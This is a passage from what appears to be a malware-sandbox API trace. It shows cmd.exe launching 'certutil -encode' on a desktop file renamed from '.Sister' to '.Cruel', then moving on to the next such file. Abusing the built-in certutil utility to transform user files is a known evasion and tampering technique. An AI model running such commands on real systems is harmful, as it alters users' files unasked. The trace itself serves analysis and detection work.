(HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2a460) returned 0x180 [0278.013] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0278.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0278.013] GetFileType (hFile=0x50) returned 0x2 [0278.013] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0278.013] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0278.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0278.083] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0278.162] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0278.162] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0278.163] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0278.164] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0278.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0278.164] GetFileType (hFile=0x50) returned 0x2 [0278.164] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0278.164] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0278.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0278.234] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0278.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0278.311] GetFileType (hFile=0x50) returned 0x2 [0278.311] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0278.311] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0278.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0278.393] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d2a400*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d2a400*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0278.462] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"zfOV4.swf.Sister\" \"zfOV4.swf.Cruel\" ") returned 46 [0278.462] _get_osfhandle (_FileHandle=1) returned 0x50 [0278.462] GetFileType (hFile=0x50) returned 0x2 [0278.462] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0278.462] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0278.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0278.539] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2e, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x2e) returned 1 [0278.617] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0278.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0278.617] GetFileType (hFile=0x50) returned 0x2 [0278.617] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0278.617] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0278.750] _get_osfhandle (_FileHandle=1) returned 0x50 [0278.750] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0278.837] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0278.942] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0278.942] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0278.942] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0278.942] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0278.942] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0278.942] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0278.943] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0278.943] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0278.943] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0278.943] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0278.943] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0278.943] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0278.943] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0278.943] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0278.943] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0278.943] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0278.943] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0278.943] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0278.943] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0278.943] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0278.943] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0278.943] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0278.943] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0278.943] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0278.943] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0278.943] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0278.943] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0278.943] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0278.943] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0278.943] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0278.944] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0278.944] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0278.944] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0278.944] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0278.944] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0278.944] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0278.944] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0278.944] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0278.944] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0278.944] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0278.944] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0278.944] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0278.944] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0278.944] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0278.944] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0278.944] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0278.944] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0278.944] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0278.944] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0278.944] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0278.944] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0278.944] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0278.944] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0278.944] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0278.944] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0278.945] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0278.945] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0278.945] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0278.945] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0278.945] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0278.945] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0278.945] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0278.945] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0278.945] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0278.945] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0278.945] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0278.945] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0278.945] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0278.945] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0278.945] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0278.945] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0278.945] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0278.945] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0278.945] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0278.945] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0278.945] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0278.945] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0278.945] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0278.945] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0278.945] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0278.945] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0278.946] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0278.946] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0278.946] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0278.946] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0278.946] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0278.946] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0278.946] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0278.946] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0278.946] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0278.946] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0278.946] ??_V@YAXPEAX@Z () returned 0x1 [0278.946] GetProcessHeap () returned 0x21ed8c70000 [0278.946] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9421000 [0278.946] GetProcessHeap () returned 0x21ed8c70000 [0278.946] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x7e) returned 0x21ed9379300 [0278.947] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0278.947] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0278.947] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0278.947] GetProcessHeap () returned 0x21ed8c70000 [0278.947] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed9430ff0 [0278.948] SetErrorMode (uMode=0x0) returned 0x0 [0278.948] SetErrorMode (uMode=0x1) returned 0x0 [0278.948] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed9431000, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0278.949] SetErrorMode (uMode=0x0) returned 0x1 [0278.949] GetProcessHeap () returned 0x21ed8c70000 [0278.949] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9430ff0, Size=0x52) returned 0x21ed9430ff0 [0278.949] GetProcessHeap () returned 0x21ed8c70000 [0278.949] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9430ff0) returned 0x52 [0278.949] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0278.949] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0278.949] GetProcessHeap () returned 0x21ed8c70000 [0278.949] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed937b710 [0278.949] GetProcessHeap () returned 0x21ed8c70000 [0278.949] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed937ea50 [0278.949] GetProcessHeap () returned 0x21ed8c70000 [0278.949] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937ea50, Size=0x1be) returned 0x21ed937ea50 [0278.949] GetProcessHeap () returned 0x21ed8c70000 [0278.949] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937ea50) returned 0x1be [0278.949] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0278.950] GetProcessHeap () returned 0x21ed8c70000 [0278.950] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d66cf0 [0278.950] GetProcessHeap () returned 0x21ed8c70000 [0278.950] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d66cf0, Size=0x7e) returned 0x21ed8d66cf0 [0278.950] GetProcessHeap () returned 0x21ed8c70000 [0278.950] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d66cf0) returned 0x7e [0278.950] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0278.950] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0278.951] GetLastError () returned 0x2 [0278.951] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0278.951] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0278.951] GetLastError () returned 0x2 [0278.952] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0278.952] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d0c0 [0278.965] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0278.966] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0278.967] GetLastError () returned 0x2 [0278.967] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d0c0 [0278.967] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0278.967] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0278.967] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0278.967] ??_V@YAXPEAX@Z () returned 0x1 [0278.968] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0279.053] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0279.053] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0279.053] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0279.053] GetProcessHeap () returned 0x21ed8c70000 [0279.054] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45e30 [0279.054] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0279.054] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0279.054] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0279.054] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0279.054] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0279.054] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0279.054] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0279.054] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0279.054] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0279.054] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0279.054] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0279.054] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0279.054] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0279.054] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0279.054] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0279.054] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0279.054] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0279.054] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0279.054] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0279.055] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0279.055] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0279.055] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0279.055] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0279.055] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0279.055] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0279.055] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0279.055] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0279.055] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0279.055] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0279.055] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0279.055] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0279.055] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0279.055] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0279.055] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0279.055] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0279.055] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0279.055] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0279.055] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0279.055] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0279.055] GetProcessHeap () returned 0x21ed8c70000 [0279.056] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45e30) returned 1 [0279.056] GetProcessHeap () returned 0x21ed8c70000 [0279.056] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95a20 [0279.056] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0279.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0279.056] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0279.128] _get_osfhandle (_FileHandle=0) returned 0x4c [0279.128] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0279.197] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"zfOV4.swf.Sister\" \"zfOV4.swf.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"zfOV4.swf.Sister\" \"zfOV4.swf.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"zfOV4.swf.Sister\" \"zfOV4.swf.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x728, dwThreadId=0x12f4)) returned 1 [0279.213] CloseHandle (hObject=0xa4) returned 1 [0279.213] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0279.213] GetProcessHeap () returned 0x21ed8c70000 [0279.213] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937d820) returned 1 [0279.213] GetEnvironmentStringsW () returned 0x21ed937d160* [0279.214] GetProcessHeap () returned 0x21ed8c70000 [0279.214] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d60c10 [0279.214] FreeEnvironmentStringsA (penv="=") returned 1 [0279.214] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0281.152] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0281.152] CloseHandle (hObject=0xa8) returned 1 [0281.152] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0281.152] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0281.152] GetProcessHeap () returned 0x21ed8c70000 [0281.153] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d60c10) returned 1 [0281.153] GetEnvironmentStringsW () returned 0x21ed937d160* [0281.153] GetProcessHeap () returned 0x21ed8c70000 [0281.153] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d60c10 [0281.153] FreeEnvironmentStringsA (penv="=") returned 1 [0281.153] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0281.153] GetProcessHeap () returned 0x21ed8c70000 [0281.153] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d60c10) returned 1 [0281.153] GetEnvironmentStringsW () returned 0x21ed937d160* [0281.153] GetProcessHeap () returned 0x21ed8c70000 [0281.153] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d60c10 [0281.153] FreeEnvironmentStringsA (penv="=") returned 1 [0281.153] GetProcessHeap () returned 0x21ed8c70000 [0281.153] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95a20) returned 1 [0281.153] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0281.153] ??_V@YAXPEAX@Z () returned 0x1 [0281.153] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4af0ff20, ftCreationTime.dwHighDateTime=0x1d5eaf6, ftLastAccessTime.dwLowDateTime=0x51221bc0, ftLastAccessTime.dwHighDateTime=0x1d5ed64, ftLastWriteTime.dwLowDateTime=0x51221bc0, ftLastWriteTime.dwHighDateTime=0x1d5ed64, nFileSizeHigh=0x0, nFileSizeLow=0x7a94, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="zuXa5tA1VeTtCxZv.gif.Sister", cAlternateFileName="")) returned 1 [0281.153] GetProcessHeap () returned 0x21ed8c70000 [0281.153] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937e370, Size=0x70e) returned 0x21ed8d61760 [0281.154] GetProcessHeap () returned 0x21ed8c70000 [0281.154] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d61760) returned 0x70e [0281.154] GetProcessHeap () returned 0x21ed8c70000 [0281.154] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2a5f0 [0281.154] GetProcessHeap () returned 0x21ed8c70000 [0281.154] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2a5f0, Size=0x58) returned 0x21ed8d2a5f0 [0281.154] GetProcessHeap () returned 0x21ed8c70000 [0281.154] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2a5f0) returned 0x58 [0281.154] GetProcessHeap () returned 0x21ed8c70000 [0281.154] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2a660 [0281.154] malloc (_Size=0x1ff9c) returned 